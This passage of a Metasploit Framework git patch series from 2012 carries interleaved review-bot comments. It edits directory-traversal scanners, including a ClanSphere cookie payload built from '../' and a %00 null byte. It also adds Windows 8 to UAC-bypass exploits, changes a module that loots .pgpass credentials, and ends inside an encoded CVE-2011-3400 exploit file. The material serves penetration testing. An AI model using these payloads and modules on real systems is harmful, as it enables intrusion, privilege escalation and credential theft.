File does not exist.") + print_error("\t2. The server does not have any patches deployed.") + print_error("\t3. Your 'DEPTH' option isn't deep enough.") + print_error("\t4. Some kind of permission issues.") + + elsif res and res.code == 200 + data = res.body + p = store_loot( + 'manageengine.securitymanager', + 'application/octet-stream', + ip, + data, + fname + ) + + vprint_line(data) + print_good("#{peer} - #{fname} stored as '#{p}'") + + else + print_error("#{peer} - Fail to obtain file for some unknown reason") + end + end + +end \ No newline at end of file From c878b9077b3384cc03abb43bc2b4ed049a43eefa Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 29 Oct 2012 12:25:07 -0500 Subject: [PATCH 23/64] Rename the DeviceExpert module to avoid confusion --- ...engine_traversal.rb => manageengine_deviceexpert_traversal.rb} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/auxiliary/scanner/http/{manageengine_traversal.rb => manageengine_deviceexpert_traversal.rb} (100%) diff --git a/modules/auxiliary/scanner/http/manageengine_traversal.rb b/modules/auxiliary/scanner/http/manageengine_deviceexpert_traversal.rb similarity index 100% rename from modules/auxiliary/scanner/http/manageengine_traversal.rb rename to modules/auxiliary/scanner/http/manageengine_deviceexpert_traversal.rb From 8c46c59142e895a46d620e4b6d57a8b087ac84b2 Mon Sep 17 00:00:00 2001 From: sagishahar Date: Mon, 29 Oct 2012 20:11:27 +0200 Subject: [PATCH 24/64] Add support to Windows 8 Verified with Windows 8 Enterprise Evaluation --- modules/post/windows/escalate/bypassuac.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/post/windows/escalate/bypassuac.rb b/modules/post/windows/escalate/bypassuac.rb index 7921f096b6..209f7c4d78 100644 --- a/modules/post/windows/escalate/bypassuac.rb +++ b/modules/post/windows/escalate/bypassuac.rb 
@@ -50,7 +50,7 @@ class Metasploit3 < Msf::Post vuln = false sysinfo = session.sys.config.sysinfo winver = sysinfo["OS"] - affected = [ 'Windows Vista', 'Windows 7', 'Windows 2008' ] + affected = [ 'Windows Vista', 'Windows 7', 'Windows 2008', 'Windows 8' ] affected.each { |v| if winver.include? v vuln = true From 53c7479d70377d05a17973e1e560ec49581a6a78 Mon Sep 17 00:00:00 2001 From: sagishahar Date: Mon, 29 Oct 2012 20:12:47 +0200 Subject: [PATCH 25/64] Add Windows 8 support Verified with Windows 8 Enterprise Evaluation --- modules/exploits/windows/local/bypassuac.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/local/bypassuac.rb b/modules/exploits/windows/local/bypassuac.rb index d02b18e05a..a0d30aac47 100644 --- a/modules/exploits/windows/local/bypassuac.rb +++ b/modules/exploits/windows/local/bypassuac.rb @@ -56,7 +56,7 @@ class Metasploit3 < Msf::Exploit::Local # vuln = false winver = sysinfo["OS"] - affected = [ 'Windows Vista', 'Windows 7', 'Windows 2008' ] + affected = [ 'Windows Vista', 'Windows 7', 'Windows 2008', 'Windows 8' ] affected.each { |v| if winver.include? v vuln = true From eda5e8a12f2960726f562b20cfbee0e3efe9b740 Mon Sep 17 00:00:00 2001 From: Zach Grace Date: Mon, 29 Oct 2012 14:23:50 -0500 Subject: [PATCH 26/64] Changed platform type from windows to win and fixed an indentation error. --- modules/post/multi/gather/pgpass_creds.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/post/multi/gather/pgpass_creds.rb b/modules/post/multi/gather/pgpass_creds.rb index 74ac36f48b..b997dc9519 100644 --- a/modules/post/multi/gather/pgpass_creds.rb +++ b/modules/post/multi/gather/pgpass_creds.rb @@ -10,7 +10,7 @@ class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Post::Common include Msf::Post::Unix - include Msf::Post::Windows::UserProfiles + include Msf::Post::Windows::UserProfiles def initialize(info={}) super( update_info(info, 
@@ -22,7 +22,7 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => ['Zach Grace '], - 'Platform' => %w[linux bsd unix osx windows], + 'Platform' => %w[linux bsd unix osx win], 'SessionTypes' => %w[meterpreter shell] )) end From 5c27c9c953b7afdc7b19e91ba85afc47419bd4e6 Mon Sep 17 00:00:00 2001 From: Zach Grace Date: Mon, 29 Oct 2012 15:18:13 -0500 Subject: [PATCH 27/64] Added a print_good from the results of store_loot --- modules/post/multi/gather/pgpass_creds.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/post/multi/gather/pgpass_creds.rb b/modules/post/multi/gather/pgpass_creds.rb index b997dc9519..8604023432 100644 --- a/modules/post/multi/gather/pgpass_creds.rb +++ b/modules/post/multi/gather/pgpass_creds.rb @@ -59,7 +59,8 @@ class Metasploit3 < Msf::Post files.each do |f| # Store the loot print_good("Downloading #{f}") - store_loot("pgpass.#{f}", "text/plain", session, read_file(f), "#{f}", "pgpass #{f} File") + pgpass_path = store_loot("postgres.pgpass", "text/plain", session, read_file(f), "#{f}", "pgpass #{f} file") + print_good "Postgres credentials file saved to #{pgpass_path}" # Store the creds parse_creds(f) end From d0650dfb252282337183287bdd53e28e2acca583 Mon Sep 17 00:00:00 2001 
From: James Lee Date: Mon, 29 Oct 2012 22:45:46 -0500 Subject: [PATCH 28/64] Put a bandaid over getsockname Depending on how a socket was created, #getsockname will return either a struct sockaddr as a String (the default ruby Socket behavior) or an Array (the extend'd Rex::Socket::Tcp behavior). Avoid the ambiguity when generating SSL certificates for meterpreter handlers by always picking a random hostname. This is by no means a proper fix for the underlying problem of Socket#getsockname having ambiguous behavior before and after being extended with Rex::Socket::Tcp. It does, however, solve the immediate problem of not being able to create tunneled meterpreter sessions over http(s) sessions. [SeeRM #7350] --- lib/msf/core/handler/bind_tcp.rb | 3 +-- lib/rex/io/stream_abstraction.rb | 3 +++ lib/rex/post/meterpreter/client.rb | 11 +++++++++-- 3 files changed, 13 insertions(+), 4 deletions(-) diff --git a/lib/msf/core/handler/bind_tcp.rb b/lib/msf/core/handler/bind_tcp.rb index 4122aa3592..297276288c 100644 --- a/lib/msf/core/handler/bind_tcp.rb +++ b/lib/msf/core/handler/bind_tcp.rb @@ -127,7 +127,7 @@ module BindTcp rescue Rex::ConnectionRefused # Connection refused is a-okay rescue ::Exception - wlog("Exception caught in bind handler: #{$!}") + wlog("Exception caught in bind handler: #{$!.class} #{$!}") end break if client @@ -138,7 +138,6 @@ module BindTcp # Valid client connection? if (client) - # Increment the has connection counter self.pending_connections += 1 diff --git a/lib/rex/io/stream_abstraction.rb b/lib/rex/io/stream_abstraction.rb index 6fed32d12f..6d40b21753 100644 --- a/lib/rex/io/stream_abstraction.rb +++ b/lib/rex/io/stream_abstraction.rb @@ -149,6 +149,9 @@ protected closed = true wlog("monitor_rsock: closed remote socket due to nil read") end + rescue EOFError => e + closed = true + dlog("monitor_rsock: EOF in rsock") rescue ::Exception => e closed = true wlog("monitor_rsock: exception during read: #{e.class} #{e}") 
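Review bot: In the stream_abstraction.rb hunk, the new clause `rescue EOFError => e` binds `e` without using it and is unqualified, while the clause right after it is written `rescue ::Exception => e`. `rescue ::EOFError` matches the neighbouring style and drops the unused local. This case also moves from `wlog` to `dlog`, so a short comment saying that EOF is the normal way for the remote side to close would explain the lower level. The method (presumably `monitor_rsock`, going by the log prefix) extends outside the hunk.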
diff --git a/lib/rex/post/meterpreter/client.rb b/lib/rex/post/meterpreter/client.rb index cc5591b8e6..421dc75ceb 100644 --- a/lib/rex/post/meterpreter/client.rb +++ b/lib/rex/post/meterpreter/client.rb @@ -154,7 +154,7 @@ class Client ssl = OpenSSL::SSL::SSLSocket.new(sock, ctx) # Use non-blocking OpenSSL operations on Windows - if not ( ssl.respond_to?(:accept_nonblock) and Rex::Compat.is_windows ) + if !( ssl.respond_to?(:accept_nonblock) and Rex::Compat.is_windows ) ssl.accept else begin @@ -211,12 +211,19 @@ class Client cert.version = 2 cert.serial = rand(0xFFFFFFFF) + # Depending on how the socket was created, getsockname will + # return either a struct sockaddr as a String (the default ruby + # Socket behavior) or an Array (the extend'd Rex::Socket::Tcp + # behavior). Avoid the ambiguity by always picking a random + # hostname. See #7350. + subject_cn = Rex::Text.rand_hostname + subject = OpenSSL::X509::Name.new([ ["C","US"], ['ST', Rex::Text.rand_state()], ["L", Rex::Text.rand_text_alpha(rand(20) + 10)], ["O", Rex::Text.rand_text_alpha(rand(20) + 10)], - ["CN", self.sock.getsockname[1] || Rex::Text.rand_hostname], + ["CN", subject_cn], ]) issuer = OpenSSL::X509::Name.new([ ["C","US"], From 5e873d06972279b99306b7e4563bb530a2620888 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Tue, 30 Oct 2012 12:15:01 +0100 Subject: [PATCH 29/64] adding peer information to error message --- .../scanner/http/manageengine_securitymanager_traversal.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb b/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb index b716be0c79..94d7797e8e 100644 --- a/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb +++ b/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb 
@@ -65,7 +65,7 @@ class Metasploit3 < Msf::Auxiliary if res and res.code == 500 and res.body =~ /Error report/ - print_error("Cannot obtain '#{fname}', here are some possible reasons:") + print_error("#{peer} - Cannot obtain '#{fname}', here are some possible reasons:") print_error("\t1. File does not exist.") print_error("\t2. The server does not have any patches deployed.") print_error("\t3. Your 'DEPTH' option isn't deep enough.") @@ -89,4 +89,4 @@ class Metasploit3 < Msf::Auxiliary end end -end \ No newline at end of file +end From c91f0ca535547d5598382f590a887cbcea25aafe Mon Sep 17 00:00:00 2001 From: David Maloney Date: Tue, 30 Oct 2012 09:13:55 -0500 Subject: [PATCH 30/64] Adds the WQL execution module --- modules/auxiliary/scanner/winrm/winrm_wql.rb | 69 ++++++++++++++++++++ 1 file changed, 69 insertions(+) create mode 100644 modules/auxiliary/scanner/winrm/winrm_wql.rb diff --git a/modules/auxiliary/scanner/winrm/winrm_wql.rb b/modules/auxiliary/scanner/winrm/winrm_wql.rb new file mode 100644 index 0000000000..cb33fdb476 --- /dev/null +++ b/modules/auxiliary/scanner/winrm/winrm_wql.rb 
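Review bot: Only the first of the five `print_error` calls in the 500 branch gains the `#{peer} - ` prefix; the four numbered reason lines after it are still printed bare. Because this is a scanner module that can run against many hosts, those lines cannot be attributed to a host once output is interleaved. Either prefix each one the same way, e.g. `print_error("#{peer} - \t1. File does not exist.")`, or fold the reasons into the first message so there is a single attributable line per host.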
@@ -0,0 +1,69 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+
+require 'msf/core'
+require 'rex/proto/ntlm/message'
+
+
+class Metasploit3 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::WinRM
+ include Msf::Auxiliary::Report
+
+
+ include Msf::Auxiliary::Scanner
+
+ def initialize
+ super(
+ 'Name' => 'WinRM WQL Query Runner',
+ 'Version' => '$Revision$',
+ 'Description' => %q{
+ This module runs WQL queries against remote WinRM Services.
+ Authentication is required. Currently only works with NTLM auth.
+ },
+ 'Author' => [ 'thelightcosine' ],
+ 'License' => MSF_LICENSE
+ )
+
+ register_options(
+ [
+ OptString.new('WQL', [ true, "The WQL query to run", "Select Name,Status from Win32_Service" ]),
+ OptString.new('USERNAME', [ true, "The username to authenticate as"]),
+ OptString.new('PASSWORD', [ true, "The password to authenticate with"])
+ ], self.class)
+ end
+
+
+ def run_host(ip)
+ unless accepts_ntlm_auth
+ print_error "The Remote WinRM server (#{ip} does not appear to allow Negotiate(NTLM) auth"
+ return
+ end
+
+ resp,c = send_request_ntlm(winrm_wql_msg(datastore['WQL']))
+ if resp.code == 401
+ print_error "Login Failure! Recheck the supplied credentials."
+ return
+ end
+
+ unless resp.code == 200
+ print_error "Got unexpected response from #{ip}: \n #{resp.to_s}"
+ return
+ end
+ resp_tbl = parse_wql_response(resp)
+ print_good resp_tbl.to_s
+ store_loot("winrm.wql_results", "text/csv", ip, resp_tbl.to_csv, "winrm_wql_results.csv", "WinRM WQL Query Results")
+ end
+
+
+
+end
From 3f3e6814a39ebb2e736bbd9341b38c83003b2b03 Mon Sep 17 00:00:00 2001
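Review bot: In winrm_wql.rb, the first `print_error` in `run_host` has an unbalanced parenthesis (`(#{ip} does not appear`), and the 401 branch prints "Login Failure!" with no host, so output from a run over several hosts cannot be attributed. I would close the parenthesis and prefix every message with the address, for example `print_error "#{ip} - Login Failure! Recheck the supplied credentials."`. `resp.code` is also read without first checking that `send_request_ntlm` returned a response, which will raise NoMethodError if that helper can return nil on a timeout (its contract is not visible here). The second value `c` from that call is never used and can be dropped or named `_`.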
From: sinn3r Date: Tue, 30 Oct 2012 10:40:56 -0500 Subject: [PATCH 31/64] Make sure no extra '/' in there --- modules/auxiliary/scanner/http/clansphere_traversal.rb | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/clansphere_traversal.rb b/modules/auxiliary/scanner/http/clansphere_traversal.rb index 186ef60177..ca0562fbc2 100644 --- a/modules/auxiliary/scanner/http/clansphere_traversal.rb +++ b/modules/auxiliary/scanner/http/clansphere_traversal.rb @@ -51,11 +51,15 @@ class Metasploit3 < Msf::Auxiliary peer = "#{ip}:#{rport}" print_status("#{peer} - Reading '#{datastore['FILE']}'") + traverse = "../" * datastore['DEPTH'] + f = datastore['FILE'] + f = f[1, f.length] if f =~ /^\// + res = send_request_cgi({ 'method' => 'GET', 'uri' => "#{base}index.php", - 'cookie' => "blah=blah; cs_lang=#{traverse}#{datastore['FILE']}%00.png" + 'cookie' => "blah=blah; cs_lang=#{traverse}#{f}%00.png" }) if res and res.body =~ /^Fatal error\:/ From d3bb2b489153d5e392768451d1e9ef8357bd2d6f Mon Sep 17 00:00:00 2001 From: David Maloney Date: Tue, 30 Oct 2012 11:08:57 -0500 Subject: [PATCH 32/64] minor fixups --- modules/auxiliary/scanner/winrm/winrm_wql.rb | 11 ++++++++--- 1 file changed, 8 insertions(+), 3 deletions(-) diff --git a/modules/auxiliary/scanner/winrm/winrm_wql.rb b/modules/auxiliary/scanner/winrm/winrm_wql.rb index cb33fdb476..8cb82a2db9 100644 --- a/modules/auxiliary/scanner/winrm/winrm_wql.rb +++ b/modules/auxiliary/scanner/winrm/winrm_wql.rb @@ -27,7 +27,7 @@ class Metasploit3 < Msf::Auxiliary 'Name' => 'WinRM WQL Query Runner', 'Version' => '$Revision$', 'Description' => %q{ - This module runs WQL queries against remote WinRM Services. + This module runs WQL queries against remote WinRM Services. Authentication is required. Currently only works with NTLM auth. }, 'Author' => [ 'thelightcosine' ], 
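Review bot: In the clansphere_traversal.rb hunk, the leading-slash test `f =~ /^\//` uses `^`, which in Ruby matches at the start of any line rather than the start of the string, and the slice that follows removes only one slash. `f = datastore['FILE'].sub(%r{\A/+}, '')` expresses the intent of the commit title in a single line with a string anchor. `"../" * datastore['DEPTH']` also relies on DEPTH being an Integer; the option registration is outside this hunk, so that should be confirmed there. The enclosing method starts and ends outside the hunk.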
@@ -48,8 +48,12 @@ class Metasploit3 < Msf::Auxiliary print_error "The Remote WinRM server (#{ip} does not appear to allow Negotiate(NTLM) auth" return end - + resp,c = send_request_ntlm(winrm_wql_msg(datastore['WQL'])) + if resp.nil? + print_error "Got no reply from the server" + return + end if resp.code == 401 print_error "Login Failure! Recheck the supplied credentials." return @@ -61,7 +65,8 @@ class Metasploit3 < Msf::Auxiliary end resp_tbl = parse_wql_response(resp) print_good resp_tbl.to_s - store_loot("winrm.wql_results", "text/csv", ip, resp_tbl.to_csv, "winrm_wql_results.csv", "WinRM WQL Query Results") + path = store_loot("winrm.wql_results", "text/csv", ip, resp_tbl.to_csv, "winrm_wql_results.csv", "WinRM WQL Query Results") + print_status "Results saved to #{path}" end From a636971b71ebf5c0213fbea91c7b028049bc5bfe Mon Sep 17 00:00:00 2001 From: sinn3r Date: Tue, 30 Oct 2012 11:39:25 -0500 Subject: [PATCH 33/64] Change error message --- modules/auxiliary/scanner/http/clansphere_traversal.rb | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/clansphere_traversal.rb b/modules/auxiliary/scanner/http/clansphere_traversal.rb index ca0562fbc2..377ae0b4aa 100644 --- a/modules/auxiliary/scanner/http/clansphere_traversal.rb +++ b/modules/auxiliary/scanner/http/clansphere_traversal.rb @@ -63,7 +63,10 @@ class Metasploit3 < Msf::Auxiliary }) if res and res.body =~ /^Fatal error\:/ - print_error("Either '#{datastore['FILE']}' does not exist, or no permission.") + print_error("Unable to read '#{datastore['FILE']}', possibily because:") + print_error("\t1. File does not exist.") + print_error("\t2. No permission.") + print_error("\t3. #{ip} isn't vulnerable to null byte poisoning.") elsif res and res.code == 200 pattern_end = " UTC +1 - Load:" From 357fd1b955660d364c4d100a5da04ee875295498 Mon Sep 17 00:00:00 2001 
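Review bot: In the clansphere_traversal.rb hunk, the new message misspells "possibly" as `possibily`, and the same string is carried unchanged into the next commit's hunk that adds the `#{peer}` prefix. The corrected line would be `print_error("Unable to read '#{datastore['FILE']}', possibly because:")`. The three numbered reason lines carry no host prefix, so in a multi-host scan they cannot be tied to the host that produced them; only the third mentions `#{ip}`. The enclosing method starts outside the hunk.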
From: jvazquez-r7 Date: Tue, 30 Oct 2012 17:47:17 +0100 Subject: [PATCH 34/64] add peer info to print_error message --- modules/auxiliary/scanner/http/clansphere_traversal.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/clansphere_traversal.rb b/modules/auxiliary/scanner/http/clansphere_traversal.rb index 377ae0b4aa..44fcad9341 100644 --- a/modules/auxiliary/scanner/http/clansphere_traversal.rb +++ b/modules/auxiliary/scanner/http/clansphere_traversal.rb @@ -63,7 +63,7 @@ class Metasploit3 < Msf::Auxiliary }) if res and res.body =~ /^Fatal error\:/ - print_error("Unable to read '#{datastore['FILE']}', possibily because:") + print_error("#{peer} - Unable to read '#{datastore['FILE']}', possibily because:") print_error("\t1. File does not exist.") print_error("\t2. No permission.") print_error("\t3. #{ip} isn't vulnerable to null byte poisoning.") From 8fd34a4475d14f7020ab7b6e13735e04bb820e00 Mon Sep 17 00:00:00 2001 From: "Ewerson Guimaraes (Crash)" Date: Tue, 30 Oct 2012 21:08:01 -0200 Subject: [PATCH 35/64] Update NTP Module Changed the branche and remove CR --- data/exploits/CVE-2011-3400/CVE-2011-3400.vsd | Bin 26720 -> 0 bytes modules/auxiliary/scanner/ntp/ntp_readvar.rb | 6 ++---- 2 files changed, 2 insertions(+), 4 deletions(-) delete mode 100755 data/exploits/CVE-2011-3400/CVE-2011-3400.vsd 
diff --git a/data/exploits/CVE-2011-3400/CVE-2011-3400.vsd b/data/exploits/CVE-2011-3400/CVE-2011-3400.vsd deleted file mode 100755 index b7b8116d3d54259080beda14c45430df5998c966..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 26720 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

j;lwk&564r&YWF+SCTVHdi{G5cMpYEBiJ&r2 z4qR-;eo7qJf#a#+%Ki4X?X}GomP`LQp;`9?L9MT|YHW7kzyS_ree8M@kli*aZPe_o zv%Pf)vE4sTz84`;);yq2-gEb+yS)t|4H}vg>VIjo%2#GJXL6?h%T6%W?zDjgNAD@U##0ZvL-q63`VAFLxsMb8{DPI`sT zuS7X@zRrVLF>0q^wAT4!qIT+hod>gG)K0-@t@Fo3?bP`?4`#)vor2L?=Z|@J+DU#x zQoekYB7gAIUN;*;cv->Nm0%TE4c36QU>#TwHh?dKuK@XN$Bp1_unBAi_kgd0d%=BR z3-}t?3gowD?+4q#*Ma;F=r_PO!A|f1co6IY-vYbAx4|B;7d!;M1NMQ3!6V?i;8Cz2 zJO&;I2f#tl1ilBJ0EfVn;QQb(I0BvmKL9@jN5L_09Q+9U82kjB06zuI;Ah|@I0b$V zo(9i=Ux3q~1^g2H3j7*83!VeN0sL8kaTc5dzXiVo&x7BCKY;U~6}$jm1b+lCfj@yi zgA3py_zU 'NTP Clock Variables Disclosure', 'Description' => %q{ - This module reads the system internal NTP variables. These variables contain potentially sensitive + This module reads the system internal NTP variables. These variables contain potentially sensitive information, such as the NTP software version, operating system version, peers, and more.. }, 'Author' => 'Ewerson Guimaraes(Crash) ', @@ -64,4 +62,4 @@ class Metasploit3 < Msf::Auxiliary end -end \ No newline at end of file +end From b085e8ed735f4518c0f21d2ae8de1ca44f256584 Mon Sep 17 00:00:00 2001 From: "Ewerson Guimaraes (Crash)" Date: Tue, 30 Oct 2012 21:43:21 -0200 Subject: [PATCH 36/64] Revert "Update NTP Module" This reverts commit 8fd34a4475d14f7020ab7b6e13735e04bb820e00. --- data/exploits/CVE-2011-3400/CVE-2011-3400.vsd | Bin 0 -> 26720 bytes modules/auxiliary/scanner/ntp/ntp_readvar.rb | 6 ++++-- 2 files changed, 4 insertions(+), 2 deletions(-) create mode 100755 data/exploits/CVE-2011-3400/CVE-2011-3400.vsd 
diff --git a/data/exploits/CVE-2011-3400/CVE-2011-3400.vsd b/data/exploits/CVE-2011-3400/CVE-2011-3400.vsd new file mode 100755 index 0000000000000000000000000000000000000000..b7b8116d3d54259080beda14c45430df5998c966 GIT binary patch literal 26720 zcmeI54}6tX8OPrN!eA3-P5v6Y0kMhVHUXJnu*n8nY-6#tsAh26E^Ns*+Gfn4`2Vj& zFeQ*Eln4w>6qXoRKt&7ESfv4FG0lR?vdr@1$4{>B^B#A2eea*$zuVAz@OSTd&wKtn zzvp?*bDsC!eXcF1uWEhp@u4pmwlc-&X}s0e*XV6&??GK)mITANf=Uc{tF5g~+IoT; z0hiHonP}jD$SL-VmiMLxW*fEqYcL!}j#0yVopGmZWxvZnqJUL%{tRr77yk71r%#~k z`!i=CeJ1VTeeMm@#VOuW8_RZCWi&3)TlD*L9LMu%8fgW zYQtrEqPpMF>orD?7}0+(I?8)T{pJ2RP`5@-E;+-B%{8kHr|J87tUVt|>X5_9eh|rO z%$}ZKQdnPR5<32_A4}h-iq(8qxbY55o{YEo%i2=ZtiE4G-rTqKuSO~TwVwsDKl{)} z-uv?255$3Za3$yu1^`k3<0|kz@P3d8t_B0aATSsV0Ykwsa1HnX7!Hzv1AGvS03*RD z@F6f7B!d)iEf@o?1J{GG;0BNi(m*;8IYsvI)F*(Oz(kM%ZU&RUWN-`kFqi_Sf=rMF zZUxgoHpl_uv@<|1$O9h%GeJHm0EJ){C;}e^vw@hi1bhsXf{%ka;1l4J;8UOs+y*`k z=7M>^2|feLK?QJu`CtL41XbX(;C8SOR0HwHTCfOw4%C5q&;afLp9hOUBamqR1+WAx z1z!YT0?WX1aB2Sq>iG<&j36UK^}49mj$g$W!d3L*RKhi9AoE<#>&xEh0ok6Q7m%D@ z;IUOq8(_`{bOFm?me~)zd*R^<|tD#|Rk+b}EXI+K4Ck7<< z&&Yl$axQR8iV$D<`=m|=Jqut-pig9owc_YIO`i+b@gVu?BhqcDRN240Mb|VC;E5* z$oNNq%)OqQGUh(s@BDM+*0Y9m0yxG zyD+OHr!cD^r`Vj*98lt_UbN8J;L6LsWREOH$vRS`{w$ErB9|0T?;=|gki4T3?`Yr@ zoJ2N|%IPTiqm%baYW1e)1lHHndMsng(Y~(aLY`IUB#aFs_0Jks_1Ds5MSC1#Q$~xIZtG- zivPX_Bxmf!BC=Pn;a%*xk9U9es?5>gs+Z;5_OYxlMRcAGrcEjekSC@n5&pUb`` zThh2Ri8pv6=(Ye@5?!8%Tb0Sr(nADE@7}Z+$W2Rmen+fv%h_J!ba~{Xd1j89O?K!c8>}L0TwrE|6EgD| z(0e!+5&A3-8OPUb?tcho0G7!D|W-jw#G7_4avU%qIcWPV+m;<$r?O z8N3@m|BQ07Te*8)NA1)-?P8ZIYA3r!y61J&PTkWkcB!IvvTLM!UPtZJJ?&zbDrzUY zM!M&9)K1;gE_SJ+cCu@vdtOKF)IIHDm+HM}r)A5Qz2lR!@Leogw8*aDFkN?Kr+M?{ 